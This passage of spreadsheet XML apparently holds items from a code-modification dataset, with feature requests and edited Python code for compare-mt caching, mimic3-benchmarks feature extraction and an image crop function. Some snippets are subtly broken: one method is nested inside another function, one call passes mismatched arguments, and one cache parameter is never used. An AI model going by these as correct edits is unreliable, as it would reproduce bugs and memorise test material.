 prec = []\n      for n in range(1, len(self.weights) + 1):\n        prec.append(self._precision(r, o, n))\n      cached_stats.append( (len(r), len(o), prec) )\n\n    return cached_stats\n\n# File: compare-mt/compare_mt/corpus_utils.py\n# #New: Add caching utility functions\n\ndef create_cache_key(filename, operation_type):\n  """\n  Create a unique cache key for a file and operation type\n  Args:\n    filename: The file path\n    operation_type: Type of operation (e.g., \'tokens\', \'nums\', \'alignments\')\n  Returns:\n    A unique cache key string\n  """\n  import hashlib\n  key_str = f"{filename}_{operation_type}"\n  return hashlib.md5(key_str.encode()).hexdigest()\n\ndef cache_file_data(filename, data, operation_type, cache_dict=None):\n  """\n  Cache file data for reuse\n  Args:\n    filename: The file path\n    data: The data to cache\n    operation_type: Type of operation\n    cache_dict: Optional external cache dictionary\n  Returns:\n    The cache dictionary\n  """\n  if cache_dict is None:\n    cache_dict = {}\n  cache_key = create_cache_key(filename, operation_type)\n  cache_dict[cache_key] = data\n  return cache_dict\n\ndef get_cached_file_data(filename, operation_type, cache_dict=None):\n  """\n  Retrieve cached file data\n  Args:\n    filename: The file path\n    operation_type: Type of operation\n    cache_dict: Cache dictionary to search\n  Returns:\n    Cached data if found, None otherwise\n  """\n  if cache_dict is None:\n    return None\n  cache_key = create_cache_key(filename, operation_type)\n  return cache_dict.get(cache_key, None)\n\n# File: compare-mt/compare_mt/compare_mt_main.py\n# #Modify: Update generate_score_report to use enhanced caching\n\ndef generate_score_report(\n  ref, outs,\n  src=None,\n  score_type=\'bleu\',\n  bootstrap=0, prob_thresh=0.05,\n  meteor_directory=None, options=None,\n  title=None, \n  case_insensitive=False,\n  to_cache=False,\n  cache_dicts=None,\n  persistent_cache=None  # #New: Add persistent cache parameter\n):\n  """\n  Generate a report comparing overall scores of system(s) in both plain text and graphs.\n  #Modify: Added persistent_cache parameter for cross-call caching\n  Args:\n    ref: Tokens from the reference\n    outs: Tokens from the output file(s)\n    src: Tokens for the source \n    score_type: A string specifying the scoring type (bleu/length)\n    bootstrap: Number of samples for significance test (0 to disable)\n    prob_thresh: P-value threshold for significance test\n    meteor_directory: Path to the directory of the METEOR code\n    options: Options when using external program\n    title: A string specifying the caption of the printed table\n    case_insensitive: A boolean specifying whether to turn on the case insensitive option\n    to_cache: Return a list of computed statistics if True\n    cache_dicts: A list of dictionaries that store cached statistics for each output\n    persistent_cache: #New: Dictionary for persistent caching across calls\n  """\n  # check and set parameters\n  bootstrap = int(bootstrap)\n  prob_thresh = float(prob_thresh)\n  if type(case_insensitive) == str:\n    case_insensitive = True if case_insensitive == \'True\' else False\n\n  # #New: Initialize persistent cache if not provided\n  if persistent_cache is None:\n    persistent_cache = {}\n\n  # compute statistics\n  scorer = scorers.create_scorer_from_profile(score_type, case_insensitive=case_insensitive, meteor_directory=meteor_directory, options=options)\n\n  cache_key_list = [\'scores\', \'strs\', \'sign_stats\']\n  scores, strs, sign_stats = cache_utils.extract_cache_dicts(cache_dicts, cache_key_list, len(outs))\n  if cache_dicts is None:\n    scores, strs = zip(*[scorer.score_corpus(ref, out, src=src) for out in outs])\n  \n  if to_cache:\n    cache_dict = cache_utils.return_cache_dict(cache_key_list, [scores, strs, [scorer.cache_stats(ref, outs[0], src=src)] ])\n    return cache_dict\n\n  if bootstrap != 0:\n    direcs = []\n    for i in range(len(scores)):\n      for j in range(i+1, len(scores)):\n        direcs.append( (i,j) )\n    wins, sys_stats = sign_utils.eval_with_paired_bootstrap(ref, outs, src, scorer, direcs, num_samples=bootstrap, cache_stats=sign_stats)\n    wins = list(zip(direcs, wins))\n  else:\n    wins = sys_stats = None\n\n  # generate reports\n  reporter = reporters.ScoreReport(scorer=scorer, scores=scores, strs=strs, \n                                   wins=wins, sys_stats=sys_stats, prob_thresh=prob_thresh, \n                                   title=title)\n  reporter.generate_report(output_fig_file=f\'score-{score_type}-{bootstrap}\',\n                           output_fig_format=\'pdf\', \n                           output_directory=\'outputs\')\n  return reporter\n\n# #Modify: Update generate_word_accuracy_report to use enhanced caching\n\ndef generate_word_accuracy_report(ref, outs,\n                          src=None,\n                          acc_type=\'fmeas\', bucket_type=\'freq\', bucket_cutoffs=None,\n                          freq_count_file=None, freq_corpus_file=None,\n                          label_set=None,\n                          ref_labels=None, out_labels=None,\n                          title=None,\n                          case_insensitive=False,\n                          output_bucket_details=False,\n                          to_cache=False,\n                          cache_dicts=None,\n                          persistent_cache=None):  # #New: Add persistent cache parameter\n  """\n  Generate a report comparing the word accuracy in both plain text and graphs.\n  #Modify: Added persistent_cache parameter for cross-call caching\n  """\n  # check and set parameters\n  if type(case_insensitive) == str:\n    case_insensitive = True if case_insensitive == \'True\' else False\n  if type(output_bucket_details) == str:\n    output_bucket_details = True if output_bucket_details == \'True\' else False\n\n  # #New: Initialize persistent cache if not provided\n  if persistent_cache is None:\n    persistent_cache = {}\n\n  if type(ref_labels) == str:\n    ref_labels = corpus_utils.load_tokens(ref_labels)\n  if out_labels is not None:\n    out_label_files = arg_utils.parse_files(out_labels)\n    out_labels = [corpus_utils.load_tokens(x) for x in out_label_files]\n    if len(out_labels) != len(outs):\n      raise ValueError(f\'The number of output files should be equal to the number of output labels.\')\n    for i, (o, ol) in enumerate(zip(outs, out_labels)):\n      if len(o) != len(ol):\n        raise ValueError(f\'The labels in {out_label_files[i]} do not match the length of the output file {outs[i]}.\')\n\n  # compute statistics\n  bucketer = bucketers.create_word_bucketer_from_profile(bucket_type,\n                                                         bucket_cutoffs=bucket_cutoffs,\n                                                         freq_count_file=freq_count_file,\n                                                         freq_corpus_file=freq_corpus_file,\n                                                         freq_data=ref,\n                                                         label_set=label_set,\n                                                         case_insensitive=case_insensitive)\n\n  cache_key_list = [\'statistics\', \'my_ref_total_list\', \'my_out_totals_list\', \'my_out_matches_list\']\n  statistics, my_ref_total_list, my_out_totals_list, my_out_matches_list = cache_utils.extract_cache_dicts(cache_dicts, cache_key_list, len(outs))\n  if cache_dicts is None:\n    statistics, my_ref_total_list, my_out_totals_list, my_out_matches_list = bucketer.calc_statistics(ref, outs, ref_labels=ref_labels, out_labels=out_labels)\n  else:\n    my_ref_total_list = my_ref_total_list[0]\n    my_out_totals_list = list(np.concatenate(my_out_totals_list, 1))\n    my_out_matches_list = list(np.concatenate(my_out_matches_list, 1))\n  examples = bucketer.calc_examples(len(ref), len(outs), statistics, my_ref_total_list, my_out_matches_list)\n\n  bucket_cnts, bucket_intervals = bucketer.calc_bucket_details(my_ref_total_list, my_out_totals_list, my_out_matches_list) if output_bucket_details else (None, None)\n\n  if to_cache:\n    cache_dict = cache_utils.return_cache_dict(cache_key_list, [statistics, [my_ref_total_list], [my_out_totals_list] ,[my_out_matches_list]])\n    return cache_dict\n\n  # generate reports\n  reporter = reporters.WordReport(bucketer=bucketer,\n                                  statistics=statistics,\n                                  examples=examples,\n                                  bucket_cnts=bucket_cnts,\n                                  bucket_intervals=bucket_intervals,\n                                  src_sents=src,\n                                  ref_sents=ref,\n                                  ref_labels=ref_labels,\n                                  out_sents=outs,\n                                  out_labels=out_labels,\n                                  acc_type=acc_type, header="Word Accuracy Analysis",\n                                  title=title)\n  reporter.generate_report(output_fig_file=f\'word-acc\',\n                           output_fig_format=\'pdf\', \n                           output_directory=\'outputs\')\n  return reporter\n\n# #New: Add cache management utility function\n\ndef create_persistent_cache():\n  """\n  Create a persistent cache dictionary for storing computation results across multiple report generations.\n  Returns:\n    An empty dictionary to be used as persistent cache\n  """\n  return {}\n\ndef clear_persistent_cache(persistent_cache):\n  """\n  Clear all entries from the persistent cache.\n  Args:\n    persistent_cache: The cache dictionary to clear\n  """\n  persistent_cache.clear()\n\n# #Modify: Update main() to use persistent caching\n\ndef main():\n  parser = argparse.ArgumentParser(\n      description=\'Program to compare MT results\',\n      epilog=f\'For more details, see {source_code_url}\'\n  )\n  parser.add_argument(\'ref_file\', type=str,\n                      help=\'A path to a correct reference file\')\n  parser.add_argument(\'out_files\', type=str, nargs=\'+\',\n                      help=\'Paths to system outputs\')\n  parser.add_argument(\'--sys_names\', type=str, nargs=\'+\', default=None,\n                      help=\'Names for each system, must be same number as output files\')\n  parser.add_argument(\'--src_file\', type=str, default=None,\n                      help=\'A path to the source file\')\n  parser.add_argument(\'--fig_size\', type=str, default=\'6x4.5\',\n                      help=\'The size of figures, in "width x height" format.\')\n  parser.add_argument(\'--compare_scores\', type=str, nargs=\'*\',\n                      default=[\'score_type=bleu\', \'score_type=length\'],\n                      help="""Compare scores. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--compare_word_accuracies\', type=str, nargs=\'*\',\n                      default=[\'bucket_type=freq\'],\n                      help="""Compare word accuracies by buckets. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--compare_src_word_accuracies\', type=str, nargs=\'*\',\n                      default=None,\n                      help="""Source analysis. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--compare_sentence_buckets\', type=str, nargs=\'*\',\n                      default=[\'bucket_type=length,statistic_type=score,score_measure=bleu\',\n                               \'bucket_type=lengthdiff\',\n                               \'bucket_type=score,score_measure=sentbleu\'],\n                      help="""Compare sentence counts by buckets. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--compare_ngrams\', type=str, nargs=\'*\',\n                      default=[\'compare_type=match\'],\n                      help="""Compare ngrams. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--compare_sentence_examples\', type=str, nargs=\'*\',\n                      default=[\'score_type=sentbleu\'],\n                      help="""Compare sentences. Can specify arguments in \'arg1=val1,arg2=val2,...\' format.""")\n  parser.add_argument(\'--output_directory\', type=str, default=None,\n                      help="""A path to a directory where a graphical report will be saved.""")\n  parser.add_argument(\'--report_title\', type=str, default=\'compare-mt Analysis Report\',\n                      help="""The name of the HTML report.""")\n  parser.add_argument(\'--decimals\', type=int, default=4,\n                      help="Number of decimals to print for floating point numbers")\n  parser.add_argument(\'--seed\', type=int, default=None,\n                      help="Seed for random number generation")\n  parser.add_argument(\'--scorer_scale\', type=float, default=100, choices=[1, 100],\n                      help="Set the scale of BLEU, METEOR, WER, chrF and COMET to 0-1 or 0-100 (default 0-100)")\n  parser.add_argument(\'--http\', type=int, dest=\'bind_port\',\n                      help=\'Launch an HTTP server at specified port to view results.\')\n  parser.add_argument(\'-v\', \'--version\', action=\'version\', version=f\'%(prog)s {__version__}\')\n  args = parser.parse_args()\n\n  # Set formatting\n  formatting.fmt.set_decimals(args.decimals)\n\n  # Set random seed\n  if args.seed is not None:\n    npr.seed(args.seed)\n\n  # Set scale\n  scorers.global_scorer_scale = args.scorer_scale\n\n  ref = corpus_utils.load_tokens(args.ref_file)\n  outs = [corpus_utils.load_tokens(x) for x in args.out_files]\n\n  src = corpus_utils.load_tokens(args.src_file) if args.src_file else None \n  reporters.sys_names = args.sys_names if args.sys_names else [f\'sys{i+1}\' for i in range(len(outs))]\n  reporters.fig_size = tuple([float(x) for x in args.fig_size.split(\'x\')])\n  if len(reporters.sys_names) != len(outs):\n    raise ValueError(f\'len(sys_names) != len(outs) -- {len(reporters.sys_names)} != {len(outs)}\')\n\n  # #New: Create persistent cache for reusing statistics across report generations\n  persistent_cache = create_persistent_cache()\n\n  reports = []\n\n  report_types = [\n    (args.compare_scores, generate_score_report, \'Aggregate Scores\', True),\n    (args.compare_word_accuracies, generate_word_accuracy_report, \'Word Accuracies\', False),\n    (args.compare_src_word_accuracies, generate_src_word_accuracy_report, \'Source Word Accuracies\', True),\n    (args.compare_sentence_buckets, generate_sentence_bucketed_report, \'Sentence Buckets\', True)]\n  if len(outs) &gt; 1:\n    report_types += [\n      (args.compare_ngrams, generate_ngram_report, \'Characteristic N-grams\', False),\n      (args.compare_sentence_examples, generate_sentence_examples, \'Sentence Examples\', True),\n    ]\n\n  for arg, func, name, use_src in report_types:\n    if arg is not None:\n      if use_src:\n        # #Modify: Pass persistent_cache to report generation functions\n        reports.append( (name, [func(ref, outs, src, persistent_cache=persistent_cache, **arg_utils.parse_profile(x)) for x in arg]) )\n      else:\n        reports.append( (name, [func(ref, outs, persistent_cache=persistent_cache, **arg_utils.parse_profile(x)) for x in arg]) )\n\n  # Write all reports into a single html file\n  if args.output_directory != None:\n    reporters.generate_html_report(reports, args.output_directory, args.report_title)\n\n  if args.bind_port:\n    out_dir = args.output_directory\n    if not out_dir:\n      out_dir = tempfile.TemporaryDirectory().name\n      reporters.generate_html_report(reports, out_dir, args.report_title)\n    reporters.launch_http_server(out_dir, bind_port=args.bind_port)\n\n  # #New: Clear persistent cache after all reports are generated\n  clear_persistent_cache(persistent_cache)\n\n\nif __name__ == \'__main__\':\n  main()'}</t>
  </si>
  <si>
    <t>{'file_1': 'class BleuScorer(Scorer):\n    #Modify\n    def score_corpus(self, ref, out, src=None):\n        cached_stats = self.cache_stats(ref, out)\n        return self.score_cached_corpus(range(len(ref)), cached_stats)\n\n    def cache_stats(self, ref, out, src=None):\n        if self.case_insensitive:\n          ref = corpus_utils.lower(ref)\n          out = corpus_utils.lower(out)\n        cached_stats = []\n        src = [None for _ in ref] if src is None else src\n        for r, o, s in zip(ref, out, src):\n          cached_stats.append(self.score_sentence(r, o, s)[0])\n        return cached_stats', 'file_2': "def generate_score_report(ref, outs, src=None, score_type='bleu', bootstrap=0, prob_thresh=0.05, meteor_directory=None, options=None, title=None, case_insensitive=False, to_cache=False, cache_dicts=None):\n    scorer = scorers.create_scorer_from_profile(score_type, case_insensitive=case_insensitive, meteor_directory=meteor_directory, options=options)\n    #Modify\n    if to_cache:\n        cache_dict = scorer.cache_stats(ref, outs[0], src=src)\n        return cache_dict\n    scores, strs = zip(*[scorer.score_corpus(ref, out, src=src) for out in outs])", 'file_3': 'def eval_with_paired_bootstrap(ref, outs, src, scorer, direcs, num_samples=1000, cache_stats=None):\n    if cache_stats is None:\n      cache_stats = [scorer.cache_stats(ref, out, src) for out in outs]\n    wins = np.zeros((len(outs), len(outs)))\n    sys_stats = []\n    for i in range(len(outs)):\n      sys_stats.append(scorer.score_cached_corpus(range(len(ref)), cache_stats[i]))\n\n    #Modify\n    def calc_bucket_details(self, my_ref_total_list, my_out_totals_list, my_out_matches_list):\n        bucket_cnts = []\n        bucket_intervals = []\n        for i in range(len(my_out_totals_list[0])):\n          bucket_cnts.append(sum([my_out_totals_list[j][i] for j in range(len(my_out_totals_list))]))', 'file_4': "def generate_word_accuracy_report(ref, outs, src=None, acc_type='fmeas', bucket_type='freq', bucket_cutoffs=None, freq_count_file=None, freq_corpus_file=None, label_set=None, ref_labels=None, out_labels=None, title=None, case_insensitive=False, output_bucket_details=False, to_cache=False, cache_dicts=None):\n    bucketer = bucketers.create_word_bucketer_from_profile(bucket_type, bucket_cutoffs=bucket_cutoffs, freq_count_file=freq_count_file, freq_corpus_file=freq_corpus_file, freq_data=ref, label_set=label_set, case_insensitive=case_insensitive)\n    #Modify\n    bucket_cnts, bucket_intervals = bucketer.calc_bucket_details(my_ref_total_list, my_out_totals_list, my_out_matches_list) if output_bucket_details else (None, None)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'extract_features(data_raw, period, features) function in feature_extractor.py', 'invoking_code_segment': 'extract_features_from_rawdata(chunk, header, period, features) function in common_utils.py', 'feature_description': 'Add a new feature to allow the extraction of features based on custom periods and functions, enabling users to specify custom period definitions and function lists instead of being limited to predefined mappings.', 'modified_complete_code': '# mimic3-benchmarks/mimic3models/feature_extractor.py\nimport numpy as np\nfrom scipy.stats import skew\n\nall_functions = [min, max, np.mean, np.std, skew, len]\n\nfunctions_map = {\n    "all": all_functions,\n    "len": [len],\n    "all_but_len": all_functions[:-1]\n}\n\nperiods_map = {\n    "all": (0, 0, 1, 0),\n    "first4days": (0, 0, 0, 4 * 24),\n    "first8days": (0, 0, 0, 8 * 24),\n    "last12hours": (1, -12, 1, 0),\n    "first25percent": (2, 25),\n    "first50percent": (2, 50)\n}\n\nsub_periods = [(2, 100), (2, 10), (2, 25), (2, 50),\n               (3, 10), (3, 25), (3, 50)]\n\n\ndef get_range(begin, end, period):\n    # first p %\n    if period[0] == 2:\n        return (begin, begin + (end - begin) * period[1] / 100.0)\n    # last p %\n    if period[0] == 3:\n        return (end - (end - begin) * period[1] / 100.0, end)\n\n    if period[0] == 0:\n        L = begin + period[1]\n    else:\n        L = end + period[1]\n\n    if period[2] == 0:\n        R = begin + period[3]\n    else:\n        R = end + period[3]\n\n    return (L, R)\n\n\ndef calculate(channel_data, period, sub_period, functions):\n    if len(channel_data) == 0:\n        return np.full((len(functions, )), np.nan)\n\n    L = channel_data[0][0]\n    R = channel_data[-1][0]\n    L, R = get_range(L, R, period)\n    L, R = get_range(L, R, sub_period)\n\n    data = [x for (t, x) in channel_data\n            if L - 1e-6 &lt; t &lt; R + 1e-6]\n\n    if len(data) == 0:\n        return np.full((len(functions, )), np.nan)\n    return np.array([fn(data) for fn in functions], dtype=np.float32)\n\n\ndef extract_features_single_episode(data_raw, period, functions):\n    global sub_periods\n    extracted_features = [np.concatenate([calculate(data_raw[i], period, sub_period, functions)\n                                          for sub_period in sub_periods],\n                                         axis=0)\n                          for i in range(len(data_raw))]\n    return np.concatenate(extracted_features, axis=0)\n\n\n#Modify: Updated function signature to accept custom_period and custom_functions parameters\ndef extract_features(data_raw, period, features, custom_period=None, custom_functions=None):\n    #Modify: Use custom period if provided, otherwise use predefined periods_map\n    if custom_period is not None:\n        period_tuple = custom_period\n    else:\n        period_tuple = periods_map[period]\n    \n    #Modify: Use custom functions if provided, otherwise use predefined functions_map\n    if custom_functions is not None:\n        functions = custom_functions\n    else:\n        functions = functions_map[features]\n    \n    return np.array([extract_features_single_episode(x, period_tuple, functions)\n                     for x in data_raw])\n\n\n#New: Helper function to validate and convert custom period format\ndef validate_custom_period(period_config):\n    """\n    Validates custom period configuration.\n    period_config should be a tuple following the format: (type, param1, param2, param3)\n    or (type, param1, param2) for percentage-based periods.\n    """\n    if not isinstance(period_config, tuple) or len(period_config) &lt; 2:\n        raise ValueError("Custom period must be a tuple with at least 2 elements")\n    return period_config\n\n\n#New: Helper function to validate custom functions\ndef validate_custom_functions(func_list):\n    """\n    Validates that all items in func_list are callable.\n    """\n    if not isinstance(func_list, list):\n        raise ValueError("Custom functions must be a list")\n    for func in func_list:\n        if not callable(func):\n            raise ValueError(f"Function {func} is not callable")\n    return func_list\n\n\n# mimic3-benchmarks/mimic3models/common_utils.py\nimport numpy as np\nimport os\nimport json\nimport random\n\nfrom mimic3models.feature_extractor import extract_features, validate_custom_period, validate_custom_functions\n\n\ndef convert_to_dict(data, header, channel_info):\n    """ convert data from readers output in to array of arrays format """\n    ret = [[] for i in range(data.shape[1] - 1)]\n    for i in range(1, data.shape[1]):\n        ret[i-1] = [(t, x) for (t, x) in zip(data[:, 0], data[:, i]) if x != ""]\n        channel = header[i]\n        if len(channel_info[channel][\'possible_values\']) != 0:\n            ret[i-1] = list(map(lambda x: (x[0], channel_info[channel][\'values\'][x[1]]), ret[i-1]))\n        ret[i-1] = list(map(lambda x: (float(x[0]), float(x[1])), ret[i-1]))\n    return ret\n\n\n#Modify: Updated function signature to accept custom_period and custom_functions parameters\ndef extract_features_from_rawdata(chunk, header, period, features, custom_period=None, custom_functions=None):\n    with open(os.path.join(os.path.dirname(__file__), "resources/channel_info.json")) as channel_info_file:\n        channel_info = json.loads(channel_info_file.read())\n    data = [convert_to_dict(X, header, channel_info) for X in chunk]\n    \n    #Modify: Validate custom parameters if provided\n    if custom_period is not None:\n        custom_period = validate_custom_period(custom_period)\n    if custom_functions is not None:\n        custom_functions = validate_custom_functions(custom_functions)\n    \n    #Modify: Pass custom parameters to extract_features\n    return extract_features(data, period, features, custom_period=custom_period, custom_functions=custom_functions)\n\n\ndef read_chunk(reader, chunk_size):\n    data = {}\n    for i in range(chunk_size):\n        ret = reader.read_next()\n        for k, v in ret.items():\n            if k not in data:\n                data[k] = []\n            data[k].append(v)\n    data["header"] = data["header"][0]\n    return data\n\n\ndef sort_and_shuffle(data, batch_size):\n    """ Sort data by the length and then make batches and shuffle them.\n        data is tuple (X1, X2, ..., Xn) all of them have the same length.\n        Usually data = (X, y).\n    """\n    assert len(data) &gt;= 2\n    data = list(zip(*data))\n\n    random.shuffle(data)\n\n    old_size = len(data)\n    rem = old_size % batch_size\n    head = data[:old_size - rem]\n    tail = data[old_size - rem:]\n    data = []\n\n    head.sort(key=(lambda x: x[0].shape[0]))\n\n    mas = [head[i: i+batch_size] for i in range(0, len(head), batch_size)]\n    random.shuffle(mas)\n\n    for x in mas:\n        data += x\n    data += tail\n\n    data = list(zip(*data))\n    return data\n\n\ndef add_common_arguments(parser):\n    """ Add all the parameters which are common across the tasks\n    """\n    parser.add_argument(\'--network\', type=str, required=True)\n    parser.add_argument(\'--dim\', type=int, default=256,\n                        help=\'number of hidden units\')\n    parser.add_argument(\'--depth\', type=int, default=1,\n                        help=\'number of bi-LSTMs\')\n    parser.add_argument(\'--epochs\', type=int, default=100,\n                        help=\'number of chunks to train\')\n    parser.add_argument(\'--load_state\', type=str, default="",\n                        help=\'state file path\')\n    parser.add_argument(\'--mode\', type=str, default="train",\n                        help=\'mode: train or test\')\n    parser.add_argument(\'--batch_size\', type=int, default=64)\n    parser.add_argument(\'--l2\', type=float, default=0, help=\'L2 regularization\')\n    parser.add_argument(\'--l1\', type=float, default=0, help=\'L1 regularization\')\n    parser.add_argument(\'--save_every\', type=int, default=1,\n                        help=\'save state every x epoch\')\n    parser.add_argument(\'--prefix\', type=str, default="",\n                        help=\'optional prefix of network name\')\n    parser.add_argument(\'--dropout\', type=float, default=0.0)\n    parser.add_argument(\'--rec_dropout\', type=float, default=0.0,\n                        help="dropout rate for recurrent connections")\n    parser.add_argument(\'--batch_norm\', type=bool, default=False,\n                        help=\'batch normalization\')\n    parser.add_argument(\'--timestep\', type=float, default=1.0,\n                        help="fixed timestep used in the dataset")\n    parser.add_argument(\'--imputation\', type=str, default=\'previous\')\n    parser.add_argument(\'--small_part\', dest=\'small_part\', action=\'store_true\')\n    parser.add_argument(\'--whole_data\', dest=\'small_part\', action=\'store_false\')\n    parser.add_argument(\'--optimizer\', type=str, default=\'adam\')\n    parser.add_argument(\'--lr\', type=float, default=0.001, help=\'learning rate\')\n    parser.add_argument(\'--beta_1\', type=float, default=0.9,\n                        help=\'beta_1 param for Adam optimizer\')\n    parser.add_argument(\'--verbose\', type=int, default=2)\n    parser.add_argument(\'--size_coef\', type=float, default=4.0)\n    parser.add_argument(\'--normalizer_state\', type=str, default=None,\n                        help=\'Path to a state file of a normalizer. Leave none if you want to \'\n                             \'use one of the provided ones.\')\n    #New: Add arguments for custom period and functions\n    parser.add_argument(\'--custom_period\', type=str, default=None,\n                        help=\'Custom period configuration as JSON string\')\n    parser.add_argument(\'--custom_functions\', type=str, default=None,\n                        help=\'Custom functions configuration as JSON string\')\n    parser.set_defaults(small_part=False)\n\n\nclass DeepSupervisionDataLoader:\n    r"""\n    Data loader for decompensation and length of stay task.\n    Reads all the data for one patient at once.\n\n    Parameters\n    ----------\n    dataset_dir : str\n        Directory where timeseries files are stored.\n    listfile : str\n        Path to a listfile. If this parameter is left `None` then\n        `dataset_dir/listfile.csv` will be used.\n    """\n    def __init__(self, dataset_dir, listfile=None, small_part=False):\n\n        self._dataset_dir = dataset_dir\n        if listfile is None:\n            listfile_path = os.path.join(dataset_dir, "listfile.csv")\n        else:\n            listfile_path = listfile\n        with open(listfile_path, "r") as lfile:\n            self._data = lfile.readlines()[1:]  # skip the header\n\n        self._data = [line.split(\',\') for line in self._data]\n        self._data = [(x, float(t), y) for (x, t, y) in self._data]\n        self._data = sorted(self._data)\n\n        mas = {"X": [],\n               "ts": [],\n               "ys": [],\n               "name": []}\n        i = 0\n        while i &lt; len(self._data):\n            j = i\n            cur_stay = self._data[i][0]\n            cur_ts = []\n            cur_labels = []\n            while j &lt; len(self._data) and self._data[j][0] == cur_stay:\n                cur_ts.append(self._data[j][1])\n                cur_labels.append(self._data[j][2])\n                j += 1\n\n            cur_X, header = self._read_timeseries(cur_stay)\n            mas["X"].append(cur_X)\n            mas["ts"].append(cur_ts)\n            mas["ys"].append(cur_labels)\n            mas["name"].append(cur_stay)\n\n            i = j\n            if small_part and len(mas["name"]) == 256:\n                break\n\n        self._data = mas\n\n    def _read_timeseries(self, ts_filename):\n        ret = []\n        with open(os.path.join(self._dataset_dir, ts_filename), "r") as tsfile:\n            header = tsfile.readline().strip().split(\',\')\n            assert header[0] == "Hours"\n            for line in tsfile:\n                mas = line.strip().split(\',\')\n                ret.append(np.array(mas))\n        return (np.stack(ret), header)\n\n\ndef create_directory(directory):\n    if not os.path.exists(directory):\n        os.makedirs(directory)\n\n\ndef pad_zeros(arr, min_length=None):\n    """\n    `arr` is an array of `np.array`s\n\n    The function appends zeros to every `np.array` in `arr`\n    to equalize their first axis lenghts.\n    """\n    dtype = arr[0].dtype\n    max_len = max([x.shape[0] for x in arr])\n    ret = [np.concatenate([x, np.zeros((max_len - x.shape[0],) + x.shape[1:], dtype=dtype)], axis=0)\n           for x in arr]\n    if (min_length is not None) and ret[0].shape[0] &lt; min_length:\n        ret = [np.concatenate([x, np.zeros((min_length - x.shape[0],) + x.shape[1:], dtype=dtype)], axis=0)\n               for x in ret]\n    return np.array(ret)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def extract_features_single_episode(data_raw, period, functions, custom_periods=None, custom_functions=None):\n    global sub_periods\n    if custom_periods is not None:\n        periods = custom_periods\n    else:\n        periods = sub_periods\n    if custom_functions is not None:\n        functions = custom_functions\n    extracted_features = [np.concatenate([calculate(data_raw[i], period, sub_period, functions)\n                                          for sub_period in periods],\n                                         axis=0)\n                          for i in range(len(data_raw))]\n    return np.concatenate(extracted_features, axis=0) #Modify', 'file_2': 'def extract_features_from_rawdata(chunk, header, period, features, custom_periods=None, custom_functions=None):\n    with open(os.path.join(os.path.dirname(__file__), "resources/channel_info.json")) as channel_info_file:\n        channel_info = json.loads(channel_info_file.read())\n    data = [convert_to_dict(X, header, channel_info) for X in chunk]\n    return extract_features(data, period, features, custom_periods, custom_functions) #Modify', 'file_3': 'def preprocess_chunk(data, ts, discretizer, normalizer=None, custom_periods=None, custom_functions=None):\n    data = [discretizer.transform(X, end=t)[0] for (X, t) in zip(data, ts)]\n    if normalizer is not None:\n        data = [normalizer.transform(X) for X in data]\n    return extract_features_from_rawdata(data, ts, discretizer, normalizer, custom_periods, custom_functions) #Modify', 'file_4': 'def add_common_arguments(parser):\n    parser.add_argument(\'--network\', type=str, required=True)\n    parser.add_argument(\'--dim\', type=int, default=256,\n                        help=\'number of hidden units\')\n    parser.add_argument(\'--depth\', type=int, default=1,\n                        help=\'number of bi-LSTMs\')\n    parser.add_argument(\'--epochs\', type=int, default=100,\n                        help=\'number of chunks to train\')\n    parser.add_argument(\'--load_state\', type=str, default="",\n                        help=\'state file path\')\n    parser.add_argument(\'--mode\', type=str, default="train",\n                        help=\'mode: train or test\')\n    parser.add_argument(\'--batch_size\', type=int, default=64)\n    parser.add_argument(\'--l2\', type=float, default=0, help=\'L2 regularization\')\n    parser.add_argument(\'--l1\', type=float, default=0, help=\'L1 regularization\')\n    parser.add_argument(\'--save_every\', type=int, default=1,\n                        help=\'save state every x epoch\')\n    parser.add_argument(\'--prefix\', type=str, default="",\n                        help=\'optional prefix of network name\')\n    parser.add_argument(\'--dropout\', type=float, default=0.0)\n    parser.add_argument(\'--rec_dropout\', type=float, default=0.0,\n                        help="dropout rate for recurrent connections")\n    parser.add_argument(\'--batch_norm\', type=bool, default=False,\n                        help=\'batch normalization\')\n    parser.add_argument(\'--timestep\', type=float, default=1.0,\n                        help="fixed timestep used in the dataset")\n    parser.add_argument(\'--imputation\', type=str, default=\'previous\')\n    parser.add_argument(\'--small_part\', dest=\'small_part\', action=\'store_true\')\n    parser.add_argument(\'--whole_data\', dest=\'small_part\', action=\'store_false\')\n    parser.add_argument(\'--optimizer\', type=str, default=\'adam\')\n    parser.add_argument(\'--lr\', type=float, default=0.001, help=\'learning rate\')\n    parser.add_argument(\'--beta_1\', type=float, default=0.9,\n                        help=\'beta_1 param for Adam optimizer\')\n    parser.add_argument(\'--verbose\', type=int, default=2)\n    parser.add_argument(\'--size_coef\', type=float, default=4.0)\n    parser.add_argument(\'--normalizer_state\', type=str, default=None,\n                        help=\'Path to a state file of a normalizer. Leave none if you want to \'\n                             \'use one of the provided ones.\')\n    parser.set_defaults(small_part=False)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def crop(image, target, region):\n    cropped_image = F.crop(image, *region)\n    target = target.copy()\n    i, j, h, w = region\n    target["size"] = torch.tensor([h, w])\n    fields = ["labels", "area", "iscrowd"]\n    if "boxes" in target:\n        boxes = target["boxes"]\n        max_size = torch.as_tensor([w, h], dtype=torch.float32)\n        cropped_boxes = boxes - torch.as_tensor([j, i, j, i])\n        cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)\n        cropped_boxes = cropped_boxes.clamp(min=0)\n        area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)\n        target["boxes"] = cropped_boxes.reshape(-1, 4)\n        target["area"] = area\n        fields.append("boxes")\n    if "masks" in target:\n        target[\'masks\'] = target[\'masks\'][:, i:i + h, j:j + w]\n        fields.append("masks")\n    if "boxes" in target or "masks" in target:\n        if "boxes" in target:\n            cropped_boxes = target[\'boxes\'].reshape(-1, 2, 2)\n            keep = torch.all(cropped_boxes[:, 1, :] &gt; cropped_boxes[:, 0, :], dim=1)\n        else:\n            keep = target[\'masks\'].flatten(1).any(1)\n        for field in fields:\n            target[field] = target[field][keep]\n    return cropped_image, target', 'invoking_code_segment': 'class 